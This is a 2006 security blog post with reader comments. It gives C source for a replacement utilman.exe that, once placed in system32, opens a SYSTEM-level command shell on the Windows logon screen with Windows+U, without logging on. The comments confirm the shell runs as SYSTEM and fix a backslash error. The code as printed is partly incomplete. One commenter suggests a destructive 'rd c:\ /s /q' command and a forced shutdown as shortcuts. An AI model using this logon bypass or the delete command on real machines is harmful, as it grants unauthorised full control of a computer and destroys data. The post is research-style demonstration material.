Didier Stevens

Thursday 31 August 2006

My second playdate with utilman.exe

Filed under: Hacking — Didier Stevens @ 20:46

Comments posted by evilbitz on my Playing with utilman.exe post gave me a great idea for another experiment with utilman.exe:

You can compile the following example with Borland’s free C++ 5.5 compiler.

Fourth experiment

Compile this simple C program, name it utilman.exe and put it in the system32 directory:

#include <stdio.h>
#include <windows.h>
#include <tchar.h>

void _tmain(void)
    LPTSTR szCmdline = _tcsdup(TEXT("CMD"));
    LPTSTR szDesktop = _tcsdup(TEXT("WinSta0\\\\Winlogon"));

ZeroMemory(&s, sizeof(s));
    s.cb = sizeof(s);
    s.lpDesktop = szDesktop;
    ZeroMemory(&p, sizeof(p));

CreateProcess(NULL, szCmdline, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &s, &p);


Whenever you press the magic key sequence (Windows Logo key & U key), a command shell will open on the Winlogon desktop. And you don’t have to be logged on to do this.



  1. What user account does the shell run as? If it is system then their is a huge security hole.

    Comment by Jay — Friday 1 September 2006 @ 14:14

  2. It’s the SYSTEM account, read this: https://didierstevens.wordpress.com/2006/08/21/playing-with-utilmanexe/

    Comment by Didier Stevens — Friday 1 September 2006 @ 16:28

  3. It doesn’t matter on which desktop the cmd runs.
    utilman.exe always runs as SYSTEM.

    Nice man 😉

    Comment by evilbitz — Friday 1 September 2006 @ 20:00

  4. […] For a demo of My second playdate with utilman.exe, go here on YouTube. […]

    Pingback by Playing with utilman.exe, The Motion Picture « Didier Stevens — Tuesday 5 September 2006 @ 10:00

  5. Hi, i compile you’re script with no error, replace in dllcache and system32, block sfc when prompt to restore, but when i press “Windows key” + U, nothing, you’re script in the 3 exemple work, but not the last with CMD.

    Comment by Jacky — Wednesday 16 April 2008 @ 13:56

  6. The example only works for me when
    LPTSTR szDesktop = _tcsdup(TEXT(“WinSta0\\\\Winlogon”));
    is replaced with
    LPTSTR szDesktop = _tcsdup(TEXT(“WinSta0\\Winlogon”));

    The \ has to be doubled (not quadrupled) for masking.

    Comment by MF — Tuesday 6 October 2009 @ 7:03

  7. Yes, \\ The \\\\ stems from an old issue with the PRE format in WordPress.

    Comment by Didier Stevens — Tuesday 6 October 2009 @ 19:06

  8. Wow i guess the best way to protect against this is either true crypt or replacing windows with linux? XD

    This makes for some handy shortcuts i.e.
    The nuke rd c:\ /s /q “why isnt my narrator working!? :P”
    hide shutdown -s -f -t 00

    Dude how about using you programming to make a visible firefox or better yet for those chronic pc gammers a lazy mans button to instantly launch a visble game while killing all unsanitary process…. ohh yess

    Comment by dooshy — Tuesday 25 October 2011 @ 22:39

RSS feed for comments on this post. TrackBack URI

Leave a Reply (comments are moderated)

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Blog at WordPress.com.